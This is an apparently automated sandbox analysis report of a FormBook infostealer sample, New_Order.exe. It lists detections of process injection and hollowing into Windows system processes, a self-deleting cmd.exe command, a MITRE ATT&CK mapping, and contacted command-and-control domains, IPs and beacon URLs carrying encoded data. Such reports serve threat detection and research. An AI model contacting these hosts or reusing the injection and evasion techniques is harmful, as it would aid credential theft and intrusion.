          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04894D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04873D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048EA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0488B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0488B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04887D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0488C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0488C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048FFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04930EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04930EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04930EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04892ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04938ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0491FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04892AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04898E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04878A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04883A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04865210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04865210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04865210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04865210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0491FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04869240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04869240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04869240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04869240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04877E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04877E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04877E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04877E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04877E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04877E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048F4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0491B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0491B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04938A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0488AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0488AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0488AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0488AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0488AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04871B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04871B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\wscript.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.charmboutiques.com
          Source: C:\Windows\explorer.exeDomain query: www.shanghainternational.com
          Source: C:\Windows\explorer.exeNetwork Connect: 91.148.168.141 80
          Source: C:\Windows\explorer.exeDomain query: www.voiceclubdubai.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeDomain query: www.websitemax.co.uk
          Source: C:\Windows\explorer.exeNetwork Connect: 8.210.40.49 80
          Source: C:\Windows\explorer.exeNetwork Connect: 150.95.255.38 80
          Source: C:\Windows\explorer.exeDomain query: www.roastedorganic.com
          Source: C:\Windows\explorer.exeDomain query: www.year-action.xyz
          Source: C:\Windows\explorer.exeDomain query: www.susanestuart.com
          Source: C:\Windows\explorer.exeNetwork Connect: 75.2.115.196 80
          Source: C:\Windows\explorer.exeNetwork Connect: 62.149.189.71 80
          Source: C:\Windows\explorer.exeDomain query: www.w-c727or.net
          Source: C:\Windows\explorer.exeDomain query: www.kantan-sedori.com
          Source: C:\Windows\explorer.exeDomain query: www.geacasolaro.com
          Source: C:\Windows\explorer.exeDomain query: www.hdjakdhf.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 85.233.160.22 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\New_Order.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\wscript.exeThread register set: target process: 3472
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\SysWOW64\svchost.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\SysWOW64\svchost.exeSection unmapped: C:\Windows\SysWOW64\wscript.exe base address: 1260000
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\New_Order.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2EEB008
          Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Windows\SysWOW64\svchost.exe 'C:\Users\user\Desktop\New_Order.exe'
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\svchost.exe'
          Source: explorer.exe, 00000002.00000000.253797902.0000000005EA0000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.241804697.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.241804697.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000002.00000002.495816911.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000002.00000000.241804697.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000002.00000000.241804697.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionAccess Token Manipulation1Virtualization/Sandbox Evasion3OS Credential DumpingSecurity Software Discovery231Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection612Access Token Manipulation1LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection612Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 411746 Sample: New_Order.exe Startdate: 12/05/2021 Architecture: WINDOWS Score: 100 31 www.thelordnelsonwinthorpe.com 2->31 33 www.algaeflipflops.com 2->33 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 8 other signatures 2->47 11 New_Order.exe 18 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\a9g5j8lkcs3.dll, PE32 11->29 dropped 59 Writes to foreign memory regions 11->59 61 Maps a DLL or memory area into another process 11->61 15 svchost.exe 11->15         started        signatures6 process7 signatures8 63 Modifies the context of a thread in another process (thread injection) 15->63 65 Maps a DLL or memory area into another process 15->65 67 Sample uses process hollowing technique 15->67 69 2 other signatures 15->69 18 explorer.exe 6 15->18 injected process9 dnsIp10 35 voiceclubdubai.com 91.148.168.141, 49717, 80 TELEPOINTBG Bulgaria 18->35 37 fwd3.hosts.co.uk 85.233.160.22, 49720, 80 ISIONUKNamescoLimitedGB United Kingdom 18->37 39 15 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 51 Performs DNS queries to domains with low reputation 18->51 22 wscript.exe 18->22         started        signatures11 process12 signatures13 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          New_Order.exe39%VirustotalBrowse
          New_Order.exe18%MetadefenderBrowse
          New_Order.exe60%ReversingLabsWin32.Trojan.SpyNoon
          New_Order.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nshC36E.tmp\a9g5j8lkcs3.dll45%ReversingLabsWin32.Trojan.Pwsx

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.2.New_Order.exe.24e0000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.svchost.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.New_Order.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          0.0.New_Order.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.geacasolaro.com/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=7Y2cvYyrvfqxgunt3pZhUV8c5sAKyRnRxEqYxYZ4IV2yKeALIaVm9IYD5cxomw6uu8uh0%Avira URL Cloudsafe
          http://www.hdjakdhf.com/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=TR2dy7NfXkcYQth3vstvigvFAK3lzNu6618cspSNEjM/3bTBgf6HWtuv8wkgUujUQhHp0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.voiceclubdubai.com/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=S3hZ9hucZB3EtOR58Q5nEiimGsTcBclBSgHOETXnBYv0klj7oHI8wHmFL3huZKvOqIBH0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.year-action.xyz/icsm/?zZSlDz=logo8bpUoQPWTQLlZghyT7WZQjxZBYpYOJDMMbKRF5+Nw+24xZrLdIoslO6i49yZrWE6&b6jPH=FBZdWxvpgT0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.websitemax.co.uk/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=bWXej36VQHpcttmtRFRFltU4ahfDKjPxw8enIUkEUFX2dD9DLv700yN2zBLMaSA3vN4R0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.roastedorganic.com/icsm/?zZSlDz=zaS0K7Z6s3udRIV54ona/Y7FMvuM79U9hGlb72LKWqTP1QF33lUaB5+awkVfTrm4Szdf&b6jPH=FBZdWxvpgT0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          www.voiceclubdubai.com/icsm/0%Avira URL Cloudsafe
          http://www.susanestuart.com/icsm/?zZSlDz=LFJNa/qc3hvrLE0QUTB49n97WnaBmuBdNse4fNn2XI4P2ly5LcfV2yqmdABiPtDvfVQd&b6jPH=FBZdWxvpgT0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.roastedorganic.com
          		75.2.115.196
          		truetrue
            		unknown
            www.year-action.xyz
            		150.95.255.38
            		truetrue
              		unknown
              www.geacasolaro.com
              		62.149.189.71
              		truetrue
                		unknown
                voiceclubdubai.com
                		91.148.168.141
                		truetrue
                  		unknown
                  www.hdjakdhf.com
                  		8.210.40.49
                  		truetrue
                    		unknown
                    susanestuart.com
                    		34.102.136.180
                    		truefalse
                      		unknown
                      fwd3.hosts.co.uk
                      		85.233.160.22
                      		truetrue
                        		unknown
                        www.thelordnelsonwinthorpe.com
                        		94.136.40.51
                        		truefalse
                          		unknown
                          shops.myshopify.com
                          		23.227.38.74
                          		truetrue
                            		unknown
                            www.algaeflipflops.com
                            		64.190.62.111
                            		truefalse
                              		unknown
                              www.charmboutiques.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.shanghainternational.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.voiceclubdubai.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.websitemax.co.uk
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.susanestuart.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.w-c727or.net
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.kantan-sedori.com
                                          		unknown
                                          		unknowntrue
                                            		unknown

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.geacasolaro.com/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=7Y2cvYyrvfqxgunt3pZhUV8c5sAKyRnRxEqYxYZ4IV2yKeALIaVm9IYD5cxomw6uu8uhtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.hdjakdhf.com/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=TR2dy7NfXkcYQth3vstvigvFAK3lzNu6618cspSNEjM/3bTBgf6HWtuv8wkgUujUQhHptrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.voiceclubdubai.com/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=S3hZ9hucZB3EtOR58Q5nEiimGsTcBclBSgHOETXnBYv0klj7oHI8wHmFL3huZKvOqIBHtrue
                                            • Avira URL Cloud: safe
                                            		unknown
